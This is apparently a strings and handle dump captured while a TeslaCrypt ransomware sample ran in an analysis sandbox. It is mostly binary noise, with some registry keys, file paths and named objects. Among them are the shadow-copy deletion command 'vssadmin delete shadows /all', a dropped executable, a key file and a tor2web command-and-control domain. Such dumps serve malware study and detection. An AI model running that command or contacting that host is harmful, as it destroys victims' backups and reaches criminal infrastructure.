`Kfu
 Agu
Hgu
,:C
p1s
A0w
0@0w
 A0w
`B0w
`"4w
:w@
:$,
(~%,
R/'
O_
B",
S#,
q1=
5.>
c;,
7n4,
W14
F4u
S4u
C4u
B4uPB4u0D4u
A4u*\B
snh
s"l
s,l
s6l
e8u
f8u
38u@48u
u8u0i8u
g8u`d8u
f8u
B8u
78u
d8u
g8upX8u
R8u@f8u`m8u0g8u e8u
u@K
upR
u`!
uP"
u@J
u@J
u@J
u@E
u !
u@J
u@E
uPm
u@!
up>
u@Y
uPr
U4u
U4u
U4u
U4u
@rp
@rf
@rJ
@r@
@r6
@r,
@r"
@rT
@rQ
@rG
@r,
u0W
s@<
s@:
s ?
sP:
s06
s@v
s0!
s`7
s 6
@rv
@r>
@r=
@r
@r*
@rm
@rh
@rr
@r|
@rv
@rb
@rG
@rQ
@r[
@r(
@r<
@r|
@r<
@rY
@r8
@r]
p;P
p;P
jwC
p;P
p;P
p;P
p;P
@:P
p,P
p;P
d5s
by6s
\REG
05s
p;P
`,P
E5s
05s
$LP
$LP
p;P
w2s
M2s
f2s
M2s
cm2s
\REGISTR
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\SOFjjAR
\REGISTR
BMA
E\SOFTWARE\Microsoft\WCMSvc\Selection
0w#
H9x
hd5s
90w#
n "
n "
n`I
nZI
n0
n@&
n0
n@&
NT AUTHORITY
npi
htq
(Dr
pP:
ppQ
p @
p`G
p@R
p@Y
p S
ppB
p0r
p@q
p@5
p`X
wL<
sPI
sP8
s O
s0K
s`F
s@L
s`G
s@J
s0E
sP:
w:A
ws@
w}@
w_@
wU@
wK@
w0@
w{C
wqC
w!C
w+C
w5C
w?C
wIC
wSC
w]C
wgC
w"D
wrD
whD
w^D
wTD
wJD
w@D
w,D
w}B
wCE
w9E
w/E
wME
w7B
wUB
wKB
wAB
wiB
wsB
w-B
w#B
_G-w
Z~m
h.,w
0wB
/-w^
~--w
~--w
*-wh
@+-w
C:\Users\Dummy\AppData\Roaming\tpoawuj.exe
#V@
uRW@
0wB
iuybmsf
mC:\Users\Dummy\AppData\Roaming\tpoawuj.exe
@.w
t0w
~-w
 3.w
8y-w
y-w
t0w
~-w
8y-w
y-w
Ut-w
t-w,
 `fs
@.w
@.w
@.w
p-w
;q-w
z:w
:wP
z:w
,w
47m
,wp
 z:w
t0wl
t0w
t0w
~-w
 3.w
t0w
~-w
8y-w
y-w
Ut-w
t-w
@.w
p-w
;q-wx
p-w
H-wh
_G-w
47m
4RS
t0w
z:w
,wz
0wr
U1wt
"wC
CRYPTB
"wP
"wx
"wp
"wx
RYPTBASE.dll
 #w
#wp
#w\
"w
"wh
"wN
"wh
"wP
3w<
C:\Windows\system32\
nh.dllll
.dllllxe
>+w
F/w
@/w0
 4w
 0w
rsaenh.dll
_G-w
_G-w
(.l
-w8
8 .l
-wR
 .l
indo
 .l
 .l
 .l
(.l
(.l
(.l
(.l
3:>
[(.l
D.l
(.l
(.l
(.l
(.l
(.l
H-w_G-w
_gu
+wX~m
_G-w
X~m
0w?s
0pl
_gu
AzB
0pl
]gu0
^gu5
`V1w
^gu
Fhu
/,#
$^@
0wB
/-wV
~--w
~--w
*-w
@+-w
C:\Users\Dummy\AppData\Roaming\key.dat
(pl
 .l
(pl
(.l
0pl
(pl
-wv
0wB
"0w
uyV.w
F:gu0
S:gu
k8gu0
yV.wX
Fhu
[+hu
lRgu
Tgu
Qgui
IQgu
Ogu
Tgu
Fhu]
Jgu
gux
gu@Hgu
SZ4
vssadmin delete shadows /all
8WB
}X/w
0wj
MX/w
8c1w
@.w
t0w4
~-wL
 3.w
8y-w(
y-w
Ut-w
t-w
,w<
O)w<
,w
,w&
C:\Windows\SysWOW64
p-w
;q-w
..w
O)w
47m
 z:w
:w`
,Q/w
,wV
,w*
,wB
8Or
C:\Windows\SYSTEM32\kernelbase.dll
0wB
B.w
B.wb
,w,
hS)w6
..w
*.w
U1w
*.w
pi-ms-win-core-string-l1-1-0.dll
dll
dll
u2-w@
`{:w
`yo
`{:w
0w:Q.w
IQ.wp
O.w
H.w.
{:w
0wB
U1w
.wz
uf+w
U/w
-wl"0w
{:w
up^
,wF
`{:w
{:w
90w
@pm
 um
}X/w
0wj
MX/w
8c1w
n\$
nR$
n-$
n#$
YMv
YMv
xSoftware\Microsoft\Windows NT\CurrentVersi
file
.w9
786-3
0w.
uZW
?SMv
NSMv
C:\Users\Dummy
YMv
YMv
xSoftware\Microsoft\Windows\
rrentVersih
j.-w\
~--w\
~--w
)/w
)/w>%
)/w
t~m
S-1-5-21-609387795-2945462786-3858536984-1S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
YMv
YMv
YMv
YMv
xSoftware\M
/wE
T'u
T'u
j.-wH
~--w
~--w
*-w
xWz
@+-w
uC:
C:\Users\Dummy\AppData\LocalLow
-wB
pWz
xWz
pWz
_G-w
_G-w
f~m
@7u
xWz
xWz
&xWz
xWz
87u
87u
@7u
0wB
/-w
@7u
~--w
~--w
*-wH7u
@+-wH
H7u
C:\Users\Dummy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Met
Pua
-wJ
87u
DE58335AFAF9
DC$
.w&
87u
.w(
.w&
0wB
u.{!
ones\3
"w _
#w0
,#wq
,#w
!wp
"w0
#w`
#w.g
"0w
7tno4hib47vlep5o.tor2web.fi
7tno4hib47vlep5o.tor2web.fi
Pdw
xez
'-w
m:w
v0Jo
 uo
0Jo
pez
pez
xez
,wJ
xez
U1w
Pdw
xez
xez
,wP
xez
,wxez
xez
.wf
.wp
90w
,wP
 Ou
}X/w
0wj
MX/w
8c1w
ux+
uh+
.?AVtype_info@@
.?AVSafeIntException@@
\/!:
OLE: Icon source next (Unicode)
OLE: Icon label next (Unicode)
IconOnly
oleaut32.dll
  Bv
Avp
?v`
@vP$@v
{Av`
Gv@
"Bv
.?AVout_of_range@std@@
.?AVResultException@wil@@
.?AVbad_alloc@std@@
.?AVexception@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
4&u
;!d
h[J
Y*Y\w
4&u
;!d
h[J
Y*Y\w
u0X
u@.
_G-wj6w
(iz
 iz
 iz
@wo
H-w@7u
_G-w
f~m
j.-w
@7u
~--w
0wB
-wH
@7u
-w^
-wR+w
@7u
@7u
U1wqc/w
w8#x
qc/w
 iz
09x
"P%
~--w4
j.-w
:Q%
yV.w*
0}t
L}t
d}t
d}t
u.rw
"0w
ocsp2.globalsign.com
ocsp2.globalsign.com
0wo
-w`
@7u
09x
09x
@Yz
87u
87u
,wJ
@7u
U1w&
/wh
@7u
0'u
@7u
,wP
@7u
,w@7u
@7u
.wf
.wp
90w
,wP
}X/w
0wj
MX/w
8c1w
..-ba
fixturesbx
RETRY-~1.JS
-time.js
tention.js
UNLOCK~1.JS
k-no-cb.js
FR575
JSOfr.json
on"
IT344A~1.JSOit.json
JSOko.json
NBD9DA~1.JSOn
NLF2F0~1.JSOnl.json
N8CF4~1.JSOnn.json
PL9423~1.JSOp
SR6AAC~1.
r.jsonsep
~1.JSO
zh_CN.jsonS
ZH_TW
npm-view.1
NPM-W
npm-whoami.11h
npm-l
jC/
jC/
npm-org.1
npm-pack.1
{8u
{8uF{8u
XBv
nBv@
(Av
sBv
!Av0
,Bv`'Bv
}Bv0'Bv
OBv
l8u&m8unn8u
l8u
j?v0.?v`
?v05Bv`
TBv
MBv
gBv
,Bv0
Y?v
w?v@(Bv
QBv
IBv
n?v
G?v
}Bv0rBv
rBv`BBv
JBv
}Bv`
VEvpOBv
QEv0r?v`IEv
Av w?v
*Av
p?v
EBvpv?v
"BvPI?v 3Bv@
KBv
/?v
l?v
UEvp}Dv
WEv
`4Bv
mDvp
Dv@
;Bv
!Bv
Av@
_Av0y@vP&Bv
dBv
IBv
Av
u8u
u8uVu8u
v8u
w8u
s8u
w8u&w8u0w8urs8u
s8u6u8u
MEv
?vP
Av0
Dv`HEv06BvpxDv
{Av
{Av REvp2Bv
Dv`M?v
CEv@x?v
AEv
<Bv
}Dv
<Ev
QEv
Dv@pBv tDv
TEvpt?v
(BvPuDvpREv
Dv@
Dvp
;EvP
=Ev
Bv
BvP
Bv`
Bvp
>Ev
Dv@
Dvp
Dv0
(Ev0)EvP
Bv`
Dv0}Dv
FBv
}Dv
}Dv
~Dv
pBv
~Dv
IBv`
Dvp
Bv
qBv@~Bv0~Bv@~Bv@~Bv@~Bv
|Dv
{Dv
{Dv@~Bv
qBv0|Dv
|Dv
|Dv@~Bv@~Bv
|Dv@~Bv
Dv@~Bv@~Bv@~Bv
|Dv@~Bv@~Bv0~Bv@~Bv@~Bv@~Bv@~Bv@~Bv@~Bv0~Bv
|Dv@~Bv
|Dv@~Bv@~Bv
|Dv@~Bv@~Bv@~Bv@~Bv0~Bv
|Dv0~Bv0~Bv |Dv@~Bv@~Bv0~Bv@~Bv
{Dv
|Dv0~Bv0~Bv@~Bv
Bv0
VEv
?Ev
@Ev
iDv
BEv0
Ev`
Bvp
Bv
Bv0
Bv0
Ev@
BvP
Bv`
Bvp
Ev@
Evp
Bvp
Bv@~Bv
EvP
Bv
Bv`
Ev0
Bvp
HBv
XEvPYEv
@Bv0BEv
Bv
Bv0
Bv@
BvP
Bv`
Bvp
Bv0|Dv
REv
CEv
Bv`:Fv@|Dv
DEvP
}Bv`
}Bv
}Bv
}Bv`
}Bv
}Bv
}Dv
bEvpVEvp
cEvPdEv@~Bv
yDv zDv0~Bv0~Bv ~Bv0zDv
zDv
zDv
{Dv0{Dv@~Bv@~Bv
|DvP{Dv`
DEv`
eEv0fEv
}Bv
}Bv
}Bv
fEv0gEv
hEv
Bv ?Fvp
Bv0yBvp|Dvp
?v`$Bv
!Bv@
qBv
iEv
kEv
nEv
{Dv
Ev@uBv`
|Dv
)Av
}Dv
nEv
}Dv
;Bv
VEv zDv`oEv
pEv
VEv
}Bv
Bv JBvP=Bv
lDv
DvP
+Bv
lDv
lDv
mDv0mDv`mDv
mDv
mDv nDvPnDv
nDv
qDv rDv0P?v@rDv
Ev@
YEv
ZEv
EvPZEv
Ev0
Bv`rDv uDv
%Ev
>?v0
GBvp#Bv
Bv0SEv
d?vpH?v
H?vpZEv@
IBv
Bv@xDv`_AvP
*Av
Bv0
Bvp
!Ev
EEv
FEv
Dvp
GEv0
Avp
DvpJEv
MEv
DvpIBv
Dvp
DvP
Bv
Bv0
Bv@
BvP
Bvp
Bvp
}Dv
}Dv
?Bv@
#Bv
Dvp
I?v
EvP
Dv
@Bv
Dv DBv
!Ev
Dvpq?v
EvPQEv
SEv@
Ev0UEv
Dv0
Dv0
Bv0jDv
Dv !Bv
5BvpYBv
Dvp1?v
$Bv
 Bv
?vp
?v@
Av0
)BvP
z@v
Av@
Av0
#Bv
3Bv
Bv0
Dv`iBv
 ?v
mBv
lBv
fBv
Avp
?vP3?v
?vpQEv
y8u
y8u
x8u
w8u
x8u
x8u
w8u
x8u
x8u
x8u
y8u
w8u
w8ufw8u2y8u(y8u
y8u:w8u
x8u
<y8u
y8u
y8u
y8u
z8u6z8uVz8uvz8u
z8u
z8u
z8u
z8u
{8u
ApphelpDebug
shimengstate
ShimDebugLog
C:\Users\Dummy\Desktop\TheZoo\theZoo\malwares\Binaries\Ransomware.TeslaCrypt\Ransomware.TeslaCrypt\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe
ApplicationMonitor
n`j
nPk
n@l
n0m
n n
npn
n`o
nPa
n@q
nPk
n0r
n s
n`t
nPu
n@v
n0w
npx
nPz
n }
n@l
n@l
nPp
n s
nps
n x
npx
n`y
n@{
n0|
n }
np}
n`~
n0w
nxt
nxt
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVbad_alloc@std@@
.?AVResultException@wil@@
.?AVexception@@
S-1-15-3-4096
nhV
Event
WaitCompletionPacket
IoCompletion
TpWorkerFactory
IRTimer
WaitCompletionPacket
IRTimer
WaitCompletionPacket
Directory
\KnownDlls
Directory
\KnownDlls32
Event
Event
File
Event
WaitCompletionPacket
IoCompletion
TpWorkerFactory
IRTimer
WaitCompletionPacket
IRTimer
WaitCompletionPacket
Directory
\KnownDlls32
Event
Event
File
ALPC Port
Key
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale
IoCompletion
Directory
\Sessions\1\BaseNamedObjects
TpWorkerFactory
IRTimer
WaitCompletionPacket
IRTimer
WaitCompletionPacket
Section
\Sessions\1\BaseNamedObjects\windows_shell_global_counters
Key
\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Explorer
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001
Mutant
\Sessions\1\BaseNamedObjects\SM0:7452:64:WilError_01
Semaphore
\Sessions\1\BaseNamedObjects\SM0:7452:64:WilError_01_p0
Key
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager
Key
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Key
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions
Key
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions
File
Semaphore
Semaphore
Key
\REGISTRY\MACHINE
Event
Event
Event
Event
Event
Event
Event
IoCompletion
WindowStation
\Sessions\1\Windows\WindowStations\WinSta0
Desktop
\Default
WindowStation
\Sessions\1\Windows\WindowStations\WinSta0
File
Event
WaitCompletionPacket
Semaphore
Semaphore
Event
Event
ALPC Port
Key
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Ids
File
Thread
Process
Mutant
\Sessions\1\BaseNamedObjects\System1230123
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows NT\CurrentVersion
Section
\Windows\Theme945286230
Section
\Sessions\1\Windows\Theme15090842
Semaphore
Semaphore
Event
File
Thread
File
Event
Event
Thread
Event
File
IoCompletion
TpWorkerFactory
IRTimer
WaitCompletionPacket
IRTimer
WaitCompletionPacket
File
Event
File
Thread
Thread
File
File
IoCompletion
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ALPC Port
Key
\REGISTRY\USER
File
Section
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Internet Explorer\Main\FeatureControl
Key
\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Policies
ALPC Port
Key
\REGISTRY\MACHINE\SOFTWARE\Policies
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software
Key
\REGISTRY\MACHINE\SOFTWARE\WOW6432Node
Event
Key
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9
Event
Key
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5
Thread
Event
Event
WaitCompletionPacket
Event
Thread
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
Event
ALPC Port
File
Event
Thread
Thread
ALPC Port
Event
Event
Event
WaitCompletionPacket
Event
Event
Event
WaitCompletionPacket
Event
Event
Event
WaitCompletionPacket
Event
Event
Event
WaitCompletionPacket
TpWorkerFactory
IRTimer
WaitCompletionPacket
IRTimer
WaitCompletionPacket
Event
Event
WaitCompletionPacket
Section
\BaseNamedObjects\F932B6C7-3A20-46A0-B8A0-8894AA421973
Section
Section
\Sessions\1\BaseNamedObjects\windows_webcache_bloom_section_{F81FF90A-E97F-4842-9169-3CD99860C053}
ALPC Port
ALPC Port
Event
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Key
\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Thread
Event
Section
\Sessions\1\BaseNamedObjects\UrlZonesSM_Dummy
Mutant
\Sessions\1\BaseNamedObjects\ZonesCacheCounterMutex
Event
Mutant
\Sessions\1\BaseNamedObjects\ZonesLockedCacheCounterMutex
Thread
File
Event
ALPC Port
ALPC Port
File
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Semaphore
Mutant
Event
Mutant
Event
Event
Key
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\crypt32
Event
WaitCompletionPacket
IoCompletion
TpWorkerFactory
IRTimer
WaitCompletionPacket
IRTimer
WaitCompletionPacket
Thread
Key
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Key
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Key
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root
File
Key
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA
Key
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA
Event
Event
Event
Event
WaitCompletionPacket
Event
Event
Event
WaitCompletionPacket
File
File
Semaphore
Semaphore
Event
Semaphore
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History
Event
File
File
Event
Thread
Event
Event
Event
Event
WaitCompletionPacket
Event
Event
Event
WaitCompletionPacket
Event
Event
Event
WaitCompletionPacket
Event
Event
Event
WaitCompletionPacket
Event
File
ALPC Port
Event
Key
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Thread
Event
Event
Thread
Thread
Event
File
Thread
Event
Semaphore
Thread
Thread
File
File
`In
 Jn
0Jn
`Jn
pLn
0Mn
0Kr
@1s
P1s
`1s
p1s
05s
p6s
 >s
0>s
@>s
P>s
0?s
@ds
0fs
@fs
p,t
 3u
03u
P6u
07u
@7u
p7u
 Fu
`Fu
`Hu
pHu
PKu
PJv
PRv
p w
 &w
0&w
p&w
 'w
0'w
`'w
P:w